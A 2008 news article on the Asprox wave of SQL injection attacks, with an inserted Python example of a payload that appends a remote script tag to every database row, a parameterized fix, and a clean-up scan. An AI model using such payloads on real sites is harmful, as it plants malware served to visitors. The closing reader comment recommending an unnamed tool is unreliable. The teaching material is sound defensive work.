Security Sleuths Sound Alarm on Asprox Flare-Up

Web security firm Finjan issued a warning Thursday about a new wave of mass Web attacks that it said has affected more than 1,000 Web site domains, including government, retail, healthcare and advertising sites.

Security vendors have been aware of the attack toolkit, dubbed “Asprox,” for several years. However, they have noticed an uptick in the popularity of the malware since 2007.

In May, cyber-criminals began a new round of mass Web attacks that successfully targeted a large number of government and top business Web sites around the world, the firm said. Those infected sites, in turn, infect their visitors, and the malware continues to spread.

It is a situation that businesses, not just consumers, should take very seriously, according to Finjan.

“Having the number of compromised, high traffic, legitimate domains [infected], I believe it’s a serious issue as many potential visitors can be infected,” said Yuval Ben-Itzhak, CTO at Finjan.

Major sites infected by Asprox include the official Web site of San Francisco’s City and County government, the National Health Service in the UK, Coca-Cola’s Brazil site, Snapple’s Web site, and the official site for the University of California in Irvine, the security researcher asserted.

New Attack Vector

Hackers have designed the Asprox malware to conduct an initial search using Google for Web pages with a .asp file extension. Once it has identified those sites, the malicious software launches SQL injection attacks that append a reference to the malware file inside a script tag.

SQL injection attacks exploit a vulnerability in the Web site code, Ben-Itzhak explained. It allows the hacker to inject content into the Web site’s database that is later served to every visitor of the site.

“In our case, it’s malicious content,” he added.

This, according to Finjan, makes it a highly efficient crimeware tool, as each of the compromised domains the firm documented included a reference to the malware that was served by more than 160 different domains across the Internet.

SQL injection attacks have been one of the major security headaches of 2008, with back-end databases being “peppered” with malicious code — in this case, script tags. Clean-up can be fairly painful, and there are numerous cases of Web site owners cleaning up their databases only to be hit again a few hours later. The best solution is prevention to avoid being hit in the first place, Graham Cluley, a senior technology consultant at Sophos, told TechNewsWorld.

“Hackers use SQL injection to exploit security vulnerabilities in the database running a Web site. The attack works when user input, for instance on a Web form, is not correctly filtered or checked, causing the underlying technology to execute the code and sprinkle malware throughout pages served up on the site,” he continued.
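As an added illustration (not code from the article, Finjan or Sophos), the following Python script models the injection path just described: a query built by string concatenation, run through a driver that accepts stacked statements, lets an attacker-controlled parameter append a script tag to every stored row, while the parameterized form treats the same input as plain data; a small scan then lists the tagged rows for clean-up. The table, column and host names are constructed placeholders.

```python
import re
import sqlite3

# Constructed sample values (placeholders, not real indicators). The payload has the
# shape the article describes: the request parameter closes the intended string
# literal, appends an UPDATE that tags every stored row with a remote script
# reference, and reuses the original closing quote so the batch stays valid SQL.
INJECTED_TAG = '<script src="http://malware-host.invalid/s.js"></script>'
PAYLOAD = ("1'; UPDATE products SET description = description || '"
           + INJECTED_TAG + "' WHERE '1'='1")
SCRIPT_TAG = re.compile(r"<script\b[^>]*>", re.IGNORECASE)


def make_db():
    """Build an in-memory product catalogue (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        INSERT INTO products (name, description) VALUES ('Soda', 'A fizzy drink');
        INSERT INTO products (name, description) VALUES ('Water', 'Still water');
    """)
    return conn

def lookup_vulnerable(conn, product_id):
    """Classic string concatenation: the request parameter becomes part of the SQL.
    executescript() stands in for a driver that runs stacked statements in one call."""
    sql = "SELECT name FROM products WHERE id = '" + product_id + "'"
    conn.executescript(sql)

def lookup_safe(conn, product_id):
    """Parameterized query: the value is bound separately and can never become SQL."""
    cur = conn.execute("SELECT name FROM products WHERE id = ?", (product_id,))
    return [row[0] for row in cur.fetchall()]

def find_injected_rows(conn):
    """Clean-up aid: ids of rows whose stored text now carries a script tag."""
    cur = conn.execute("SELECT id, description FROM products")
    return [row_id for row_id, desc in cur if SCRIPT_TAG.search(desc or "")]

def demo():
    """Run the same payload through both paths; return the tagged row ids of each."""
    vuln, safe = make_db(), make_db()
    lookup_vulnerable(vuln, PAYLOAD)
    lookup_safe(safe, PAYLOAD)
    return find_injected_rows(vuln), find_injected_rows(safe)

if __name__ == "__main__":
    print(demo())  # ([1, 2], [])
```

The scan in find_injected_rows is the kind of check a site owner can run after clean-up to confirm the database has not been re-tagged.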

Malware such as Asprox typically tries to take advantage of a vulnerability or exploit to automatically install itself onto the users’ computer. In other cases, the malicious application’s writers will use social engineering to fool the computer user into installing the code — pretending the malware is really a codec that needs to be installed to view a video, for instance, Cluley explained.

Bad for Business

Finjan said it recorded more than 1,000 mass attacks in just the first two weeks of July.

“If anything, in our opinion, Finjan [is] being conservative about the number of Web pages that have been struck by these SQL injection attacks in recent weeks. Sophos identifies, on average, one new Web page hosting malware every five seconds — the majority of which are struck by SQL injection,” Cluley said.

Businesses with an online presence should be concerned, said both security professionals.

“As businesses cannot prevent their users from visiting these legitimate sites, they are left with a potential risk. In order to detect and prevent such attacks that come from high-traffic, legitimate sites, businesses should adopt real-time content inspection technologies in addition to their anti-virus security products,” Ben-Itzhak told TechNewsWorld.

Any business with a Web presence needs to ensure that it is properly defended — and hardened — to reduce the chances of hackers managing to inject malicious code into their site, Cluley noted.

“One of the reasons the Web is so popular with attackers today is that innocent sites can be compromised and used to infect large numbers of victims. It is easy to think that the only victim of these attacks is the innocent computer user, who is exposed to malicious code when browsing compromised,” he continued.

The most important thing a business can do is to ensure that it has published secure code on the Web site that cannot be exploited by hackers, Cluley pointed out. “Good development practice should be able to filter out attempts to blast a Web site with an SQL injection attack.”

For more information, he suggests reading an advisory Microsoft published in June that details how businesses can secure their Web applications from these sorts of attacks.

“This attack might better explain how malicious the Web is today. Unlike five years ago when we were infected by a virus that damaged our PC, today malicious content is served from compromised legitimate sites and is silently installed on our PC without our consent. Hackers have changed their attacks so we will not remove the malicious content after the infection and they can steal files, e-mails and username/password from us,” Ben-Itzhak concluded.

1 Comment

  • Thanks thebeanieman, I just downloaded the firefile from firestorm and it seems to be protecting my site nicely. Every bad query I have tried has been blocked. So far so good. So thanks. 🙂
